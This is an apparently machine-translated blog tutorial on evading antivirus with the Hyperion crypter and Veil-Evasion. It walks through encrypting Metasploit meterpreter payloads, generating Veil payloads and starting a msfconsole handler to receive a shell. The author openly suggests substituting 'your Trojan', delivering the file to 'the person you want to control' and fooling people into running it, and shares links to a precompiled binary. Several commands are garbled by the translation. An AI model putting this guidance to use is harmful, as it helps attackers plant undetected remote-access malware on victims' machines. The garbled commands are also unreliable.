Chatting about bypass AV

Kid paper. Don't worry about AV ~ The AV mentioned here is AntiVirus. That is, kill software. (These days the exam is heavy and even less ..)
This article briefly introduces the commonly used kill-free tools and their usage ~

0x00 Hyperion
First, let's talk about this, because it's relatively lightweight ~, Why is it light-weight, because 360 anti-virus can be detected ..

In fact, it is an encryption tool that uses five rounds of AES encryption to encrypt your payload. After encryption, the payload can run under windows. Working principle:It outputs an executable encrypted file. That's right. This file is the payload you used during the attack. After the output file is generated and executed on the target machine, the executable file attempts to crack the KEY of the AES Encryption Algorithm of the encrypted file, after cracking, the encrypted file (meterpreter payload) will be automatically run ).

Company: http://nullsecurity.net/tools/binary.html
After downloading and decompressing the package, a Makefile file is available in linux.
First, go to the following directory:
Cd ~ /. Wine/drive_c/MinGW/bin/
Run the following command to download and decompress the source code in the "Src" directory:
Wine g‑cmd.exe Hyperion-1.0/Src/Crypter/*. cpp-o bypassav.exe
 
If the command is correct, bypassav.exe is ready now. The next step is to encrypt our payload code. The entire process is automated. You only need to specify the Output Folder path and output file name, then a free payload will be generated.
Why haven't you compiled successfully? Okay, kid paper. I'll give you mine.
Link: http://pan.baidu.com/s/1zjkD8 password: gayw

The following is how to use it. It is very simple. Here, you should note that the compiled exe should be placed in the root directory, that is, under the epoch-1.0 directory.
Win: Enter the name generated by bypassav.exe payload on the dos interface. For details, see:

 
Lin:

After success, the demo1.exe binary file will be created in the current directory, that is, the payload of "no kill". Why is it enclosed in quotation marks. Because even if the source file is a normal file, it will be killed by 360 after it is encrypted by the company .. For example:

The virus was reported as soon as the game went off. Why should we introduce him? It's very useful to kill software abroad! From coffee ~

Another point to note is that pr and other programs that require interaction cannot be killed. Why? You can understand the principle. He just runs and cannot execute commands with parameters ~ So what should we do? Your payload can also be replaced with your Trojan, (* ^__ ^ *) Hey ......


0x01 Veil

The second artifact! An absolute artifact is essential for payload bypass AV. It is a tool for killing and removing goods ~~

Introduction:
VeilIt is a Payload tool that uses Metasploit framework to generate compatible payload. In most network environments, Veil can bypass common anti-virus software. It will try its best to make every Payload file random.
Currently, Veil can use seven different methods to connect 21 different payloads to Meterpreter. Veil provides you with the option to convert Pyinstaller or Py2Exe into an executable Python payload.
When using Pyinstaller (veil user), kaliLinux can directly convert their files into executable files (exe) without using a virtual machine or a second instance. When Py2Exe is used, Veil generates three files, which are used to create the final executable file;
The payload file (Python) will point to running Py2Exe, which is a batch processing script to convert into an executable file payload. To generate the final payload, copy the three output files (Python, Py2Exe, PyCrypto) to a Windows host and execute the batch processing script.
This will build the final executable file and upload it to the target. Executable files can be discarded anywhere and all the exe files in the required library storage on any Windows system. Once the execution is abandoned on the system, payload will cause meterpeter to call back the undetected AV.
: Https://github.com/veil-evasion/Veil
The following is a brief description of how to use it ~
First, install:
After the download, go to the Veil directory.

For example, enter the setup directory, there will be a setup. sh, and then we run
Sudo./setup. sh
Root permission is required here ~
Then, he downloads some files and installs them. The python installation interface is displayed, just like installing win Software. Keep the next step and keep the default settings.
Run Veil. py in the Veil root directory after installation.
Python Veil. py
Then the Veil interface is opened, such:


Here we can see several modules. What !? You don't know? Children's paper, English is still easy to learn !!
Here, we can see all the payloads in the list.

We can see that there are 20, and then we use one of them. This demonstration uses the python module.
Enter use 13
The first one is selected, and then the payload option is entered, such:

Enter generate
Then we can choose whether to use msfvenom or custom shellcode.
Enter the selected payload, and then enter the ip address and port number, for example:

Then press enter and press Enter. Wait a moment and you will be asked to enter the file name. Then you can enter a random name. Then, select pyinstaller. Our payload will generate ~


There are the paths of these files, and the rest is to give the generated file a way to the person you want to control where to let him run, how to do it? Think for yourself...
 
Of course, we need to run msf
There is a handlers directory above. We can see that there is no wood. Let's go in ~
Cd ~ /Veil-output/handlers/
Then there is a file running in this directory.
Msfconsole-r demo_handler.rc
Then msf starts. When another person runs the file, you can get a shell (meterpreter I selected here)


Wait, just run the question? Today I am not saying "no kill? Haha, look at the effect ~

However, there is a small defect, and there is still a point that we cannot take the initiative to commit.
This is what security guard will do ..
 




What should we do? We can choose to use the shell_bind_tcp payload, so that we will not report, but will ask the other party whether to allow the program to access the network ~ Of course, the premise is that the other party is on the Internet so that you can access his computer --.
How to bind it, how to fool people, it depends on you ~
 
The following is a video of foreigners:
Link: http://pan.baidu.com/s/1cO8hE password: v2v9
 
Mom said don't do anything bad ~
Please indicate the source of the post: http://blog.sina.com.cn/ridterQ